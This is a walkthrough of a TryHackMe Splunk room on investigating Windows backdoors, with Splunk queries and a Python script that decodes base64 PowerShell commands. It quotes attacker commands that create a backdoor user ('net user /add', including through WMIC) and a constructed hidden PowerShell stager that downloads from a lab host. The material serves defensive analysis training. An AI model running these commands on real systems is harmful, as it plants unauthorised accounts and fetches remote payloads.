This write-up covers the Splunk challenge room on TryHackMe.
Scenario
SOC Analyst Johny noticed unusual activity in the logs from several Windows machines. It seems that an attacker has gained access to these machines and set up backdoors. Johny's manager has asked him to collect the logs from these suspected machines and add them to Splunk for a quick review.
Task
How many events were collected and ingested in the index main?
An index is the repository in which Splunk stores and organizes ingested data for searching. Searching on the index name alone returns every event it holds, and the event count is displayed above the results.
index=main
The adversary was successful in creating a backdoor user. What is the new username?
Searching for Event ID 4720, which Windows logs whenever a user account is created (a local account or a domain account). The TargetUserName field carries the name of the account that was created.
index=main EventID="4720"
| table Hostname TargetUserName

On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key?
We already have the hostname and the username. Sysmon Event ID 12 records registry key creation and deletion (13 records value writes). Adding the new username as a free-text keyword narrows the results to the key that references the backdoor account, and the TargetObject field gives its full path.
index=main Hostname="Micheal.Beaven" EventID="12" A1berto
| table Category Hostname EventID TargetObject

Examine the logs and identify the user that the adversary was trying to impersonate.
"dedup User" keeps the first event for each distinct User value, so the table lists every unique user seen in the index. The impersonated account is the legitimate user whose name the backdoor account "A1berto" mimics.
index=main User="*"
| dedup User
| table User

What is the command used to add a backdoor user from a remote computer?
By searching for the new username as a free-text keyword and tabling the command line field, the command that created the backdoor is easy to spot.
index=main A1berto
| table Commandline
Note: The results show two commands that create the user. The first runs net user /add A1berto paw0rd1 through WMIC, which uses Windows Management Instrumentation (WMI) to execute a process on a remote computer; this is the command the question asks for. The second is the plain local net user /add A1berto paw0rd1, which runs only on the machine it is typed on and has no remote capability.

How many times was the login attempt from the backdoor user observed during the investigation?
Reviewing all user activity recorded by the Windows Event Log and Sysmon shows that the newly created user "A1berto" generated no events of its own: the account was created but never used to log on, so the answer is zero. A more direct check is to search logon events (Event ID 4624 for a successful logon, 4625 for a failed one) with TargetUserName set to the new account.
index=main User="*"
| dedup User
| table User
What is the name of the infected host on which suspicious Powershell commands were executed?
By searching for the keyword "PowerShell" and deduplicating on Hostname, we get the host on which the suspicious PowerShell commands ran.
index=main PowerShell
| dedup Hostname
| table Hostname

PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution?
PowerShell activity is recorded in Event IDs 4103 and 4104 of the Microsoft-Windows-PowerShell/Operational log.
4103 is module logging: it records pipeline execution details, that is, each command that ran together with its parameters and the user context.
4104 is script block logging: it records the contents of every script block as it is executed, after any decoding or deobfuscation, which is what lets an analyst read encoded commands in clear text. (PowerShell transcription is a separate feature that writes commands and their output to text files, not to the event log.) Together, these two event IDs give a detailed picture of what PowerShell did on the host.
index=main EventID="4103"

An encoded Powershell script from the infected host initiated a web request. What is the full URL?
Looking at the results of the previous query (index=main EventID="4103"), one event contains a command line of the form powershell.exe -noP -sta -w 1 -enc followed by a long base64 string. The switches mean: -noP does not load the user profile, -sta runs in single-threaded apartment mode, -w 1 hides the window (WindowStyle Hidden), and -enc passes the script as base64 of its UTF-16LE bytes.
Decoding the string in CyberChef (From Base64, then remove null bytes; the nulls are the high bytes of the UTF-16LE characters) reveals a script that contains a second base64-encoded string: FroMBASe64StRInG('aAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADAALgA1AA=='). The mixed capitalization of the method name is deliberate: it defeats simple case-sensitive keyword matches on "FromBase64String".
Decoding that inner string the same way gives the address the infected machine reached, http://10.10.10.5. The script appends the URI /news.php to it, so the full URL is http://10.10.10.5/news.php.
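The two-layer decode above can be done without CyberChef. The following script is an added example, not part of the original write-up or the TryHackMe room: it pulls the -enc argument out of a PowerShell command line, decodes the UTF-16LE payload, finds any nested FromBase64String('...') literals regardless of capitalization, decodes those too, and collects URLs from every layer. The outer command line is constructed here as a typical download-cradle stager; only the inner base64 string is the one quoted in the write-up. The quoted-path heuristic (joining a URL with a '/path' literal such as '/news.php') is an assumption about how such stagers are written, not something the room states.

```python
import base64
import re
from typing import List, Optional

# -EncodedCommand and its abbreviations take base64 of the UTF-16LE script bytes,
# which is why CyberChef shows a null byte after every character.
ENC_ARG_RE = re.compile(r"-(?:enc|encodedcommand|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# [Convert]::FromBase64String('...') in any capitalisation; attackers randomise case.
NESTED_B64_RE = re.compile(r"frombase64string\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()]+")
# Heuristic (assumption): a quoted literal starting with "/" is a path appended to a host.
PATH_LITERAL_RE = re.compile(r"['\"](/[A-Za-z0-9_./?=&-]*)['\"]")


def b64decode_lenient(data: str) -> bytes:
    """Base64-decode, restoring any '=' padding that a loader stripped."""
    data = data.strip()
    return base64.b64decode(data + "=" * (-len(data) % 4))


def bytes_to_text(raw: bytes) -> str:
    """Decode as UTF-16LE when most odd-position bytes are null (ASCII text in
    UTF-16LE), otherwise as UTF-8. Handles -enc payloads and nested strings
    built with [Text.Encoding]::Unicode alike."""
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def extract_encoded_argument(commandline: str) -> Optional[str]:
    """Return the base64 string passed to -enc/-EncodedCommand, or None."""
    m = ENC_ARG_RE.search(commandline)
    return m.group(1) if m else None


def decode_encoded_command(commandline: str) -> str:
    """Outer layer: the script text hidden behind -enc."""
    arg = extract_encoded_argument(commandline)
    if arg is None:
        raise ValueError("no -enc/-EncodedCommand argument found")
    return bytes_to_text(b64decode_lenient(arg))


def decode_nested_strings(script: str) -> List[str]:
    """Inner layer(s): every FromBase64String('...') literal, decoded."""
    return [bytes_to_text(b64decode_lenient(b)) for b in NESTED_B64_RE.findall(script)]


def extract_urls(commandline: str) -> List[str]:
    """All distinct URLs found in the outer script or any nested string."""
    script = decode_encoded_command(commandline)
    urls: List[str] = []
    for layer in [script] + decode_nested_strings(script):
        for url in URL_RE.findall(layer):
            if url not in urls:
                urls.append(url)
    return urls


def reconstruct_full_urls(commandline: str) -> List[str]:
    """Join each URL with each quoted '/path' literal from the outer script
    (the DownloadString($u+'/news.php') idiom). Bare URLs if no path is present."""
    script = decode_encoded_command(commandline)
    urls = extract_urls(commandline)
    paths = PATH_LITERAL_RE.findall(script)
    if not paths:
        return urls
    return [u.rstrip("/") + p for u in urls for p in paths]


# Constructed sample, not the event from the room. INNER_B64 is the string quoted in the write-up.
INNER_B64 = "aAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADAALgA1AA=="
SAMPLE_SCRIPT = (
    "$u=[Text.Encoding]::Unicode.GetString([Convert]::FroMBASe64StRInG('" + INNER_B64 + "'));"
    "(New-Object Net.WebClient).DownloadString($u+'/news.php')"
)
SAMPLE_COMMANDLINE = "powershell.exe -noP -sta -w 1 -enc " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

if __name__ == "__main__":
    script = decode_encoded_command(SAMPLE_COMMANDLINE)
    print("outer script :", script)
    print("nested       :", decode_nested_strings(script))
    print("full URL(s)  :", reconstruct_full_urls(SAMPLE_COMMANDLINE))
```

In practice the command line comes straight from the CommandLine field of the Sysmon process-creation event (or the 4104 script block, which already holds the decoded outer layer); feed it to reconstruct_full_urls and compare the result against proxy or DNS logs for the same host.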
